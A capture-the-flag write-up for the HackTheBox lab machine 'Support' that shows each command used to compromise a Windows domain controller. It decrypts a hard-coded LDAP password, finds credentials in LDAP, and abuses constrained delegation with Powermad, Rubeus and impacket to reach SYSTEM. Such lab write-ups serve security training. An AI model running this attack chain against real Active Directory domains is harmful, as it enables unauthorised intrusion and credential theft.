Contents

🕵️ HTB-Writeup : SUPPORT

Introduction

Welcome to our new HackTheBox write-up! In this article, we will guide you through the steps we took to successfully compromise the targeted machine.

Support is an Easy Windows machine.

Recon

NMAP scan

We start by performing an NMAP scan of the target to identify open ports.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
└─$ nmap -T4 -A 10.10.11.174 -p- -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-26 21:03 CEST
Nmap scan report for 10.10.11.174
Host is up (0.032s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-09-26 19:05:19Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49700/tcp open  msrpc         Microsoft Windows RPC
61047/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

We face a Windows machine with several open ports. Ports 389 and 3268 are open, it means that there is a LDAP server that is running on the target.

LDAP recon

Using rpcclient or enum4linux we found that we are allowed to connect the ldap using the anonymous account. But we can’t get any results, we got some access denied :(

1
2
3
4
5
6
└─$ rpcclient -U '' -N 10.10.11.174
rpcclient $> lookupnames admin
result was NT_STATUS_ACCESS_DENIED

└─$ enum4linux 10.10.11.174
[...] NT_STATUS_ACCESS_DENIED

DNS recon

Using dig command we found 3 authorities:

  • support.htb
  • dc.support.htb
  • hostmaster.support.htb
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
└─$ dig srv support.htb @10.10.11.174

; <<>> DiG 9.18.6-2-Debian <<>> srv support.htb @10.10.11.174
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3411
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;support.htb.			IN	SRV

;; AUTHORITY SECTION:
support.htb.		3600	IN	SOA	dc.support.htb. hostmaster.support.htb. 105 900 600 86400 3600

;; Query time: 28 msec
;; SERVER: 10.10.11.174#53(10.10.11.174) (UDP)

SMB recon

Using impacket-smbclient or impacket-psexec we can enumerate shares.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
└─$ impacket-psexec guest@10.10.11.174
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.11.174.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'support-tools' is not writable.
[-] share 'SYSVOL' is not writable.

There is an interesting share named support-tools.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
# use support-tools
# ls
drw-rw-rw-          0  Wed Jul 20 19:01:06 2022 .
drw-rw-rw-          0  Sat May 28 13:18:25 2022 ..
-rw-rw-rw-    2880728  Sat May 28 13:19:19 2022 7-ZipPortable_21.07.paf.exe
-rw-rw-rw-    5439245  Sat May 28 13:19:55 2022 npp.8.4.1.portable.x64.zip
-rw-rw-rw-    1273576  Sat May 28 13:20:06 2022 putty.exe
-rw-rw-rw-   48102161  Sat May 28 13:19:31 2022 SysinternalsSuite.zip
-rw-rw-rw-     277499  Wed Jul 20 19:01:07 2022 UserInfo.exe.zip
-rw-rw-rw-      79171  Sat May 28 13:20:17 2022 windirstat1_1_2_setup.exe
-rw-rw-rw-   44398000  Sat May 28 13:19:43 2022 WiresharkPortable64_3.6.5.paf.exe

There are a few executables. All of them seem to be common tools except for the UserInfo.exe.zip archive which contains an executable UserInfo.exe which is not a common tool.

UserInfo.exe executable

I first unzip the executable and tried to execute it.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
.\UserInfo.exe --help

Usage: UserInfo.exe [options] [commands]

Options:
  -v|--verbose        Verbose output

Commands:
  find                Find a user
  user                Get information about a user

The executable seems to request a database (probably the ldap). According to the usage, the tool can search for users or get information about it.

I manage to get the code of the executable using DnSpy.

On the code, we find a class LdapQuery() that is used to request a LDAP server.

1
2
3
4
5
6
public LdapQuery()
	{
		string password = Protected.getPassword();
		this.entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
		this.entry.AuthenticationType = AuthenticationTypes.Secure;
		this.ds = new DirectorySearcher(this.entry);

The second line of code authenticate the user ldap to the LDAP server support.htb with a password store in the variable password.

Variable password is created by the getPassword() on the class Protected. The password is hard-coded and encrypted, let’s try to decrypt it.

Class Protected with the hard-coded password and the getPassword() function that is used to decrypt the password.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
namespace UserInfo.Services
{
	// Token: 0x02000006 RID: 6
	internal class Protected
	{
		// Token: 0x0600000F RID: 15 RVA: 0x00002118 File Offset: 0x00000318
		public static string getPassword()
		{
			byte[] array = Convert.FromBase64String(Protected.enc_password);
			byte[] array2 = array;
			for (int i = 0; i < array.Length; i++)
			{
				array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
			}
			return Encoding.Default.GetString(array2);
		}

		// Token: 0x04000005 RID: 5
		private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

		// Token: 0x04000006 RID: 6
		private static byte[] key = Encoding.ASCII.GetBytes("armando");
	}
}

I rewrite the code in python to decode the password. The first array corresponds to the result of the Convert.FromBase64String() method that return an array of 8-bit unsigned integers.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
p1 = ['\xD0','\xDB','\xF7','\xD8','\xF4','\xF0','\x81','\x88','\xF3','\x83','\xDF','\xFC','\x8F','\x94','\xDB','\x9A','\xF3','\xDD','\xDD','\xEE','\xD6','\x86','\xD5','\x96','\xCA','\xE3','\xEC','\xC8','\xEE','\xFA','\xFD','\x8F','\x94','\xD7','\xDD','\xC4']
p2 = []
key = bytes("armando", 'utf-8')
i = 0

while i < len(p1):
    p2.append(ord(p1[i]) ^ key[i % len(key)] ^ 223)
    i+=1
    
print("".join([chr(i) for i in p2]))

# 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

As a result, we get the password nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz.

We can verify that is the good password by executing the program with a running wireshark capture.

drawing

We found the same password on the wireshark capture. Running enum4linux we find that credentials are valid.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
└─$ enum4linux -a -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' 10.10.11.174

[+] Server 10.10.11.174 allows sessions using username 'ldap', password 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

[+] Attempting to map shares on 10.10.11.174

//10.10.11.174/ADMIN$	Mapping: DENIED Listing: N/A Writing: N/A
//10.10.11.174/C$	Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_NO_SUCH_FILE listing \*
//10.10.11.174/IPC$	Mapping: N/A Listing: N/A Writing: N/A
//10.10.11.174/NETLOGON	Mapping: OK Listing: OK Writing: N/A
//10.10.11.174/support-tools	Mapping: OK Listing: OK Writing: N/A
//10.10.11.174/SYSVOL	Mapping: OK Listing: OK Writing: N/A

LDAP information gathering

We now have an access to the NETLOGON & SYSVOL shares.

We can dump the LDAP server with the ldapdomaindump tool.

1
└─$ ldapdomaindump 10.10.11.174  -u 'SUPPORT\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --no-json --no-grep -o ldap 

We have an access to some users, groups, policies, computers informations. We find a new user that is a member of Shared Support Accounts & Remote Management Users group.

drawing

While, searching more information about the user, we found that there is an info key with a weird value on the json result that seems to be a password.

1
2
3
4
5
6
"distinguishedName": [
    "CN=support,CN=Users,DC=support,DC=htb"
],
"info": [
    "Ironside47pleasure40Watchful"
],

Checking with enum4linux if those are valid credentials:

1
2
3
4
└─$ enum4linux -u support -p Ironside47pleasure40Watchful 10.10.11.174

 ===================================( Session Check on 10.10.11.174 )===================================
[+] Server 10.10.11.174 allows sessions using username 'support', password 'Ironside47pleasure40Watchful'

It works! Those are valid credentials !

I try to get a shell from evil-winrm tool using our new credentials.

1
2
3
4
5
6
7
└─$ evil-winrm -i 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'

*Evil-WinRM* PS C:\Users\support\Documents> whoami
support\support

*Evil-WinRM* PS C:\Windows\Temp\test> type C:\Users\support\Desktop\user.txt
***************************9b591

We are now connected under the support user ! We can get the user flag :)

Path to the privesc

Recon

OS information gathering

We got an access denied on the systeminfo command.

1
2
3
C:\Windows\Temp\test>systeminfo
systeminfo
Access is denied.

Running a WinPEAS scan, we don’t get any interesting informations…

Bloodhound

After some research, I manage to build a Bloodhound session to help me to find the path to the domain admin.

Information gathering using bloodhound-python.

1
2
3
4
5
6
7
└─$ bloodhound-python -u support -p 'Ironside47pleasure40Watchful' -d SUPPORT.HTB -c ALL -ns 10.10.11.174

# start neo4j server
└─$ neo4j console & 

# start bloodhound & import all *.json files to the database
└─$ bloodhound

We can also use SharpHound to gather information about the domain.

1
2
3
4
# gathering data from DC.SUPPORT.HTB computer w/ Sharphound
*Evil-WinRM* PS C:\Windows\Temp\test> .\SharpHound.exe --memcache -c all -d SUPPORT.HTB -DomainController 127.0.0.1
# Download the generated archive
*Evil-WinRM* PS C:\Windows\Temp\test> download 20221029093031_BloodHound.zip 20221029093031_BloodHound.zip

Looking at the Shortest Paths to Unconstrained Delegation Systems analysis, we found that members of the group SHARED SUPPORT ACCOUNTS have GenericAll privileges to the computers DC.SUPPORT.HTB.

Our user support is a member of that group. So we have the control on a user with the GenericAll permission. It means that we will be able to elevate privilege.

Privilege escalation

Reading the Abuse Info section, we found that we will need to use Rubeus & Powerwad tools.

First, we will create a fake computer object on the AD, then set the Constrained Delegation privilege to it. This privilege allows a computer to impersonate a user or a computer against a service of a machine.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
# import Powermad
*Evil-WinRM* PS C:\Windows\Temp\test> Import-Module .\Powermad.ps1

# Add a new machine PEZZZ w/ Powermad
*Evil-WinRM* PS C:\Windows\Temp\test> New-MachineAccount -MachineAccount "PEZZZ" -Password
 $(ConvertTo-SecureString 'coucou' -AsPlainText -Force) -Verbose
Verbose: [+] Domain Controller = dc.support.htb
Verbose: [+] Domain = support.htb
Verbose: [+] SAMAccountName = PEZZZ$
Verbose: [+] Distinguished Name = CN=PEZZZ,CN=Computers,DC=support,DC=htb
[+] Machine account PEZZZ added

# Add the new PC to the AD with the Constrained Delegation privilege
*Evil-WinRM* PS C:\Windows\Temp\test> Set-ADComputer "DC" -PrincipalsAllowedToDelegateToAccount ("PEZZZ" + '$')

We created a fake machine PEZZZ, set the password to coucou. Now that our fake computer object is created, added to the AD and having the Constrained Delegation privilege, we can use it to craft a ticket that will impersonate Administrator user.

We can get our hash with Rubeus. It will be used to craft our ticket.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
*Evil-WinRM* PS C:\Windows\Temp\test> .\Rubeus.exe hash /password:coucou /user:PEZZZ$ /domain:support.htb 

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : coucou
[*] Input username             : PEZZZ$
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBhostpezzz.support.htb
[*]       rc4_hmac             : 51831BDA51454AECB5D924D0DD12DF8F
[*]       aes128_cts_hmac_sha1 : 1A6641C38697A329450C26BF8860C801
[*]       aes256_cts_hmac_sha1 : CAF0E48693C399ABFFB84DBFA051105D1A6441E6AA4591E52E477042C765698D
[*]       des_cbc_md5          : F2DA620B94AD868F

Now we create a service ticket using GetST from the impacket tools. The ticket will impersonate the Administrator user using our fake machine (PEZZZ) and our newly generated AES key.

1
2
3
4
5
6
7
8
9
└─$ impacket-getST support.htb/PEZZZ -impersonate Administrator -dc-ip 10.10.11.174 -spn http/dc.support.htb -aesKey CAF0E48693C399ABFFB84DBFA051105D1A6441E6AA4591E52E477042C765698D  

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

The command will create Administrator.ccache file. We can store our ticket path on the KRB5CCNAME environement variable.

1
└─$ export KRB5CCNAME=/home/pezzz/HTB/pentest-tools/win-exploits/ldap/Administrator.ccache

We can now use our service ticket to connect into the target using the Administrator user.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
└─$ impacket-psexec SUPPORT.HTB/Administrator@DC.SUPPORT.HTB -no-pass -k                    
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on DC.SUPPORT.HTB.....
[*] Found writable share ADMIN$
[*] Uploading file wKNBTqtX.exe
[*] Opening SVCManager on DC.SUPPORT.HTB.....
[*] Creating service CETN on DC.SUPPORT.HTB.....
[*] Starting service CETN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
**************************0e14e5

It works ! We can get the root flag :)